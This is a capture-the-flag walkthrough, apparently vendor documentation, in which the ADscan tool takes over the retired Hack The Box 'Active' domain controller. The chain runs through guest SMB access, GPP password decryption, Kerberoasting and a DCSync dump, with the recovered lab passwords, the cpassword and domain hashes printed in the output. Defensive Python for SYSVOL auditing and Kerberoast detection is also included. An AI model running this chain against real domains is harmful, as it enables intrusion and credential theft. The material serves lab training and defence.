⚡ Active - Auto-Pwn Walkthrough
Automatically compromise HTB Active using ADscan through GPP password exploitation and Kerberoasting
Lab Information
- Platform: Hack The Box
- Machine: Active (Retired)
- Difficulty: Easy
- OS: Windows Server 2008 R2
- Domain: active.htb
Prerequisites
If this is your first time using ADscan:
- Follow the Getting Started guide to install ADscan.
- Run adscan install to pull the ADscan runtime image.
Before starting this lab, verify your environment (recommended):
adscan check
adscan install # if the check reports missing images or Docker issues
Ensure you also have:
- An active VPN connection to the HTB network
- The correct VPN interface up (typically tun0)
Attack Overview
Active is vulnerable to:
- SMB Anonymous Access - Enumerate SYSVOL share without credentials
- GPP Password Extraction - Decrypt Group Policy Preferences passwords
- Kerberoasting - Extract and crack Administrator TGS ticket
- Pass-the-Hash - Gain Domain Admin access
Estimated time with ADscan: ~2-3 minutes (automatic mode)
Walkthrough
Step 1: Workspace Setup
Start ADscan and create a dedicated workspace for this lab:
adscan start
If this is your first run (no workspaces yet), ADscan will prompt you to create one.
⚠ No workspaces detected.
Enter name for a new workspace: : active
✓ Workspace 'active' created
ℹ Loading workspace data from: ~/.adscan/workspaces/active
ℹ Variables loaded from ~/.adscan/workspaces/active/variables.json
✓ Workspace data successfully processed for ~/.adscan/workspaces/active
✓ Workspace 'active' selected automatically as it's the only one.
Step 2: Configure Target
Set the scan parameters for Active:
(ADscan:active ~/.adscan/workspaces/active) > set hosts 10.10.10.100
(ADscan:active ~/.adscan/workspaces/active) > set iface tun0
(ADscan:active ~/.adscan/workspaces/active) > set auto true
✓ Hosts configured: 10.10.10.100
✓ Interface configured: tun0 with IP: 10.10.14.X
✓ Auto mode configured: True
Scope: This lab is built around classic Active Directory misconfigurations (GPP passwords + Kerberoasting). Once you can reach the Active domain controller over the HTB VPN, ADscan LITE automates the rest of the AD kill chain: discovery → initial access → Kerberoast → Domain Admin → DCSync.
For CTF machines where most of the work is web, reversing, or other non-AD puzzles before AD is exposed, see Labs Scope & Coverage to understand how to combine manual steps with ADscan.
Step 3: Start Unauthenticated Scan
Launch the initial unauthenticated enumeration:
(ADscan:active ~/.adscan/workspaces/active) > start_unauth
Security Misconfiguration: Active rejects null sessions but allows guest access to the Replication share, which contains SYSVOL data with GPP passwords. This enables password extraction without credentials.
ℹ Starting host detection on 10.10.10.100...
ℹ Starting smb scan
⚠ New domain found: active.htb
ℹ Updating DNS
✓ DNS resolution configured correctly for active.htb
✓ smb scan finished.
ℹ Checking for null sessions on SMB on the domain active.htb
✗ null sessions not accepted for domain active.htb.
ℹ Checking RID cycling for guest session
✗ Could not obtain usernames through RID cycling with a guest session on domain active.htb.
ℹ Checking shares access with a null session on domain active.htb
╭─────────────────────────────────────────────────────╮
│ SMB Shares discovered on active.htb (null session) │
│                                                     │
│ Host          Share          Permission             │
│ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │
│ 10.129.3.84   Replication    READ                   │
╰─────────────────────────────────────────────────────╯
Do you want to search for juicy information in the shares in domain active.htb with a null session (⚠ WARNING: This will be really noisy and will saturate the network in big domains)? [y/n] (y): y
ℹ Searching for interesting file extensions in the shares of domain active.htb. This might take a while, please be patient
✗ No files found
ℹ Searching for possible passwords in the shares of domain active.htb. This might take a while, please be patient
ℹ Log saved in smb/spidering_passw.log
✓ Credentials found in shares:
DOC_CREDENTIALS (1 found)
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━┳━━━━━━┓
┃ # ┃ Value                                              ┃ ML Confidence ┃ Line ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━╇━━━━━━┩
│ 1 │ edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZG... │ 96.94%        │ 14   │
└───┴────────────────────────────────────────────────────┴───────────────┴──────┘
✓ Credentials saved to smb/spidering/ directory:
ℹ - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
ℹ Detected potential Group Policy cpassword in share results. Decrypting and storing it instead of using it for password spraying.
✓ cpassword found (smb/spidering_passw.log:14): edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
ℹ Decrypting the password with gpp-decrypt
✓ Username: SVC_TGS
✓ Password: GPPstillStandingStrong2k18
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
What's happening:
- ADscan detects domain active.htb and configures DNS resolution
- Null sessions are rejected for RPC, but a null session is accepted on the SMB share
- RID cycling fails, so ADscan tries share enumeration instead
- Replication share found with READ access (contains SYSVOL data)
- ADscan searches for sensitive files in the share
- Groups.xml discovered with encrypted GPP password (cpassword attribute)
- Microsoft's published AES-256 key used for decryption
- Result: initial credentials obtained: SVC_TGS:GPPstillStandingStrong2k18
Initial Access Achieved! Credentials obtained: SVC_TGS:GPPstillStandingStrong2k18
Step 4: Authenticated Enumeration (Automatic)
ADscan pivots with SVC_TGS credentials and performs comprehensive domain enumeration:
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
ℹ Starting authenticated enumeration for 'active.htb' domain.
ℹ BloodHound data collection for active.htb is starting
⚠ Could not establish LDAPS connection on domain active.htb. Retrying with LDAP...
✓ BloodHound collector executed successfully on the domain active.htb using LDAP.
ℹ Launching BloodHound CE suite...
✓ BloodHound CE is ready! Access at: http://localhost:8442/ui/login
ℹ Uploading ZIP file to BloodHound CE automatically
ℹ Searching for enabled computers on domain active.htb
1 Enabled Computers found
╭───────┬───────────────────╮
│ Index │ Enabled Computers │
├───────┼───────────────────┤
│ 1 │ dc.active.htb │
╰───────┴───────────────────╯
ℹ Creating a list of all enabled users for domain active.htb
2 Enabled Users found
╭───────┬───────────────╮
│ Index │ Enabled Users │
├───────┼───────────────┤
│ 1 │ SVC_TGS │
│ 2 │ Administrator │
╰───────┴───────────────╯
ℹ Searching for AS-REP roastable users in domain active.htb
✗ No asreproastable users found in domain active.htb
ℹ Searching for kerberoastable users in domain active.htb
╭──────────────────────────────────────────────────────────────────────────────╮
│ Kerberoastable Users in active.htb (Authenticated) │
│ ╭─────────────────────────────────────────┬──────────────────────────────╮ │
│ │ User │ Privileges │ │
│ ├─────────────────────────────────────────┼──────────────────────────────┤ │
│ │ Administrator │ Administrator │ │
│ ╰─────────────────────────────────────────┴──────────────────────────────╯ │
╰──────────────────────────────────────────────────────────────────────────────╯
What's happening:
- ADscan authenticates as SVC_TGS and obtains a Kerberos TGT
- Runs BloodHound data collection for privilege escalation path discovery
- Enumerates all enabled users and computers in the domain
- Tests for AS-REP roastable users (none found)
- Critical finding: Administrator account is Kerberoastable (has SPN set)
- This allows extracting the Administrator TGS ticket for offline cracking
Technical detail: accounts with an SPN can be Kerberoasted. Any authenticated user can request a TGS ticket for that SPN; the ticket is encrypted with a key derived from the account's password, so it can be cracked offline.
Step 5: Privilege Escalation (Automatic)
ADscan automatically performs Kerberoasting attack and cracks the Administrator password:
ℹ Using rockyou as the default wordlist.
⚠ Cracking kerberoast hashes. Please be patient (this may take a while)
╭──────────────────────────────── Hash Cracked ────────────────────────────────╮
│ 🔓 Cracked Credentials │
│ ╭───────────────┬──────────────────╮ │
│ │ Username │ Password │ │
│ ├───────────────┼──────────────────┤ │
│ │ Administrator │ Ticketmaster1968 │ │
│ ╰───────────────┴──────────────────╯ │
╰──────────────────────────────────────────────────────────────────────────────╯
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]
⚠ The user administrator is in the privileged list of domain active.htb
⚠ User administrator has elevated privileges in the domain (adminCount=1).
⚠ The user administrator is a member of the Domain Admins group
What's happening:
- ADscan uses hashcat to crack the Kerberoast hash against rockyou wordlist
- Administrator password cracked: Ticketmaster1968
- New Kerberos TGT obtained with Administrator credentials
- ADscan detects the account has Domain Admin privileges
- Result: Complete Domain Admin access achieved
Domain Admin Access Achieved! With Administrator credentials, we have complete control over the domain.
5.1 Automatic Flag Capture
ADscan uses Administrator credentials to automatically retrieve both flags:
ℹ Obtaining flags from domain active.htb
⚠ atexec method failed. Changing to wmiexec and retrying.
Flags in domain active.htb
╭──────┬─────────────────────────────────────────┬──────────────────────────────────╮
│ Type │ Path │ Flag │
├──────┼─────────────────────────────────────────┼──────────────────────────────────┤
│ user │ C:\Users\SVC_TGS\Desktop\user.txt │ adb87382372a50***************** │
│ root │ C:\Users\Administrator\Desktop\root.txt │ f9f87d5730777d***************** │
╰──────┴─────────────────────────────────────────┴──────────────────────────────────╯
ℹ User flag saved to: /root/.adscan/workspaces/active/flags/user.txt
ℹ Root flag saved to: /root/.adscan/workspaces/active/flags/root.txt
Machine Owned! Both flags captured in approximately 1.5 minutes.
5.2 Complete Credential Dump (DCSync)
After capturing flags, ADscan performs a complete DCSync to dump all domain credentials:
Do you want to perform a DCSync in domain active.htb? [y/n]: y
Specify the user to extract NTLM hashes from (type 'All' for all users) (Administrator): All
ℹ Performing DCSync for all users
✓ Found credential: active.htb/Administrator with hash 5ffb4aaaf9b63dc519eca04aec0e8bed
⚠ Hash cracked for user 'Administrator'. Password preview: Ti************68
🔒 Upgrade to PRO to view and save the full password.
✓ Found credential: active.htb/krbtgt with hash b889e0d47d6fe22c8f0463a717f460dc
✓ Found credential: active.htb/SVC_TGS with hash f54f3a1d3c38140684ff4dad029f25b5
✓ DCSync completed successfully.
ℹ Extracted 3 domain credentials.
Extracted credentials for domain active.htb
╭───────────────┬──────────────────────────────────╮
│ User │ Credential │
├───────────────┼──────────────────────────────────┤
│ Administrator │ Ti************68 │
│ krbtgt │ b889e0d47d6fe22c8f0463a717f460dc │
│ SVC_TGS │ f54f3a1d3c38140684ff4dad029f25b5 │
╰───────────────┴──────────────────────────────────╯
Extracted credential set:
- 3 total credentials: all domain accounts extracted
- Administrator - Domain Admin hash + cracked password preview (PRO shows full)
- krbtgt - Domain controller Kerberos service account hash
- SVC_TGS - Service account hash (password already known from GPP)
Full Domain Compromise Complete! ADscan has automatically:
- Gained initial access via GPP password extraction
- Escalated privileges through Kerberoasting
- Achieved Domain Admin via Administrator credentials
- Captured both user and root flags
- Dumped all 3 domain account credentials via DCSync
Total time: ~2-3 minutes in automatic mode
Attack Chain Breakdown
Vulnerability: Anonymous access to SYSVOL share containing Group Policy files.
ADscan automation:
- Attempts SMB null session
- Enumerates accessible shares
- Identifies SYSVOL with read permissions
- Recursively searches for GPP XML files
- Locates Groups.xml with encrypted passwords
Discovery: \\active.htb\SYSVOL\active.htb\Policies\{...}\MACHINE\Preferences\Groups\Groups.xml
Vulnerability: Microsoft published the AES-256 key used to encrypt GPP passwords (MS14-025).
Technical details:
- Group Policy Preferences allow setting local admin passwords
- Passwords stored in SYSVOL XML files with "cpassword" attribute
- Microsoft published decryption key in MSDN documentation
- Any domain user can decrypt these passwords
ADscan automation:
- Parses Groups.xml file
- Extracts cpassword attribute
- Decrypts using published AES key
- Validates username/password combination
Discovery: SVC_TGS:GPPstillStandingStrong2k18
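As an added example (not ADscan code and not part of the original walkthrough), here is the defender-side counterpart of the GPP finding from Step 3 and the breakdown above: it walks a SYSVOL-like tree, parses the GPP preference XML files that MS14-025 covers, and reports every non-empty cpassword attribute without decrypting it. The directory layout and policy GUID are placeholders, and the sample Groups.xml is constructed around the cpassword value shown in the walkthrough.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can carry a cpassword attribute (the MS14-025 set), and
# the attribute that names the affected account in each of them.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")

def find_cpasswords(sysvol_root):
    """Walk a SYSVOL tree; return (relative file, account, cpassword) per stored password."""
    hits = []
    for dirpath, _, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # not well-formed XML, so no cpassword can be read from it
            for props in root.iter("Properties"):
                cpw = props.get("cpassword")
                if not cpw:  # attribute absent or empty: no password is stored
                    continue
                account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
                hits.append((os.path.relpath(path, sysvol_root), account, cpw))
    return hits

# Constructed sample (Groups.xml layout as on Active; the second user has no stored password).
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" userName="active.htb\\SVC_TGS"
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>
  </User>
  <User name="active.htb\\Guest"><Properties userName="active.htb\\Guest" cpassword=""/></User>
</Groups>
"""

def audit_sample():
    """Write the sample under a temporary SYSVOL-like tree, audit it, and return the hits."""
    with tempfile.TemporaryDirectory() as sysvol:
        gp_dir = os.path.join(sysvol, "active.htb", "Policies", "{EXAMPLE-GUID}",
                              "MACHINE", "Preferences", "Groups")  # GUID is a placeholder
        os.makedirs(gp_dir)
        with open(os.path.join(gp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return find_cpasswords(sysvol)
```

Every hit is a password that any domain user can read, so the fix is to rotate the account and delete the preference item, not just to remove the file.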
Vulnerability: Administrator account configured with Service Principal Name (SPN).
Technical details:
- Accounts with SPNs can be Kerberoasted
- Any authenticated user can request TGS tickets
- TGS tickets encrypted with account's password hash
- Offline cracking of TGS reveals plaintext password
ADscan automation:
- Enumerates accounts with SPNs (GetUserSPNs)
- Identifies Administrator with active/CIFS SPN
- Requests TGS ticket for the service
- Extracts TGS hash from ticket
- Cracks hash using configured wordlists
Discovery: Administrator:Ticketmaster1968
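As an added detection example (not ADscan code and not part of the original walkthrough), the Kerberoast step described in Steps 4 and 5 and in the breakdown above leaves Event ID 4769 service-ticket requests on the domain controller; the script below flags RC4 (0x17) requests for user-account SPNs while ignoring krbtgt and machine accounts. The pipe-separated line format, timestamps and client IPs are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType requested by Kerberoast tooling; AES is 0x11/0x12

# Constructed sample of DC security events, one per line:
# time|event_id|requesting account|service name|ticket encryption type|client ip
SAMPLE_EVENTS = """\
2024-01-01T10:00:01|4768|SVC_TGS|krbtgt|0x17|10.10.14.5
2024-01-01T10:00:02|4769|SVC_TGS|krbtgt|0x17|10.10.14.5
2024-01-01T10:00:02|4769|SVC_TGS|DC$|0x17|10.10.14.5
2024-01-01T10:00:03|4769|SVC_TGS|Administrator|0x17|10.10.14.5
2024-01-01T10:05:00|4769|DC$|Administrator|0x12|10.10.10.100
"""

def parse_events(text):
    """Parse the constructed line format into dicts; enc_type is decoded from hex."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, requester, service, enc, ip = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "event_id": int(event_id),
                       "requester": requester, "service": service,
                       "enc_type": int(enc, 16), "ip": ip})
    return events

def kerberoast_alerts(events, window=timedelta(seconds=60)):
    """Flag RC4 service-ticket requests (4769) for user-account SPNs, grouped by requester."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev["event_id"] != 4769 or ev["enc_type"] != RC4_HMAC:
            continue
        svc = ev["service"]
        # krbtgt is the ticket-granting service itself and machine accounts have long
        # random passwords: neither is a practical Kerberoast target, so skip both.
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        by_requester[(ev["requester"], ev["ip"])].append(ev)
    alerts = []
    for (who, ip), evs in by_requester.items():
        evs.sort(key=lambda e: e["time"])
        first = evs[0]["time"]
        burst = sum(1 for e in evs if e["time"] - first <= window)  # requests in one window
        alerts.append({"requester": who, "ip": ip, "burst": burst,
                       "services": sorted({e["service"] for e in evs})})
    return alerts

if __name__ == "__main__":
    for a in kerberoast_alerts(parse_events(SAMPLE_EVENTS)):
        print(f"{a['requester']} from {a['ip']} requested RC4 tickets for {a['services']}")
```

On a 2008 R2 domain RC4 is still common, so the user-account-SPN condition is what makes this rule specific; a high burst count (many SPNs requested within one window) raises confidence further.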
Result:
- Full Domain Admin privileges via Administrator credentials
- Complete control over Active Directory
- All domain credentials accessible
- User and root flags captured
Timing Breakdown
Automatic mode (set auto true):
- Unauthenticated scan + SMB enum: ~20–30 seconds
- GPP password decryption: ~5 seconds
- Authenticated enumeration: ~15–20 seconds
- Kerberoasting + cracking: ~45–60 seconds
- Privilege escalation + flag capture: ~15–20 seconds
- Total (observed): ~1.5 minutes end-to-end
Manual time: 15–30 minutes | ADscan time: ~1.5 minutes
Troubleshooting
SMB access denied
Verify anonymous access is allowed:
smbclient -N -L //10.10.10.100
# Should list shares without credentials
GPP file not found
Manually search SYSVOL:
# ADscan searches recursively
# Check if SYSVOL/Replication share is accessible
Kerberoasting hash won't crack
Try alternative wordlists:
# Administrator password may not be in rockyou.txt
Clock skew errors
Synchronize time with target DC:
sudo ntpdate 10.10.10.100
# Kerberos requires time sync within 5 minutes
Key Learning Points
What ADscan Automated
- Reconnaissance: SMB share enumeration via null session
- Initial Access: GPP password extraction and decryption
- Post-Compromise: Domain enumeration and SPN discovery
- Privilege Escalation: Kerberoasting and TGS cracking
- Post-Exploitation: Complete domain credential dump
Security Lessons
- GPP passwords: Microsoft deprecated GPP passwords in MS14-025, but legacy policies may still exist
- SYSVOL hardening: Restrict anonymous access to SYSVOL share
- SPN auditing: Administrator and privileged accounts should not have SPNs
- Password policy: Weak passwords enable fast Kerberoasting cracking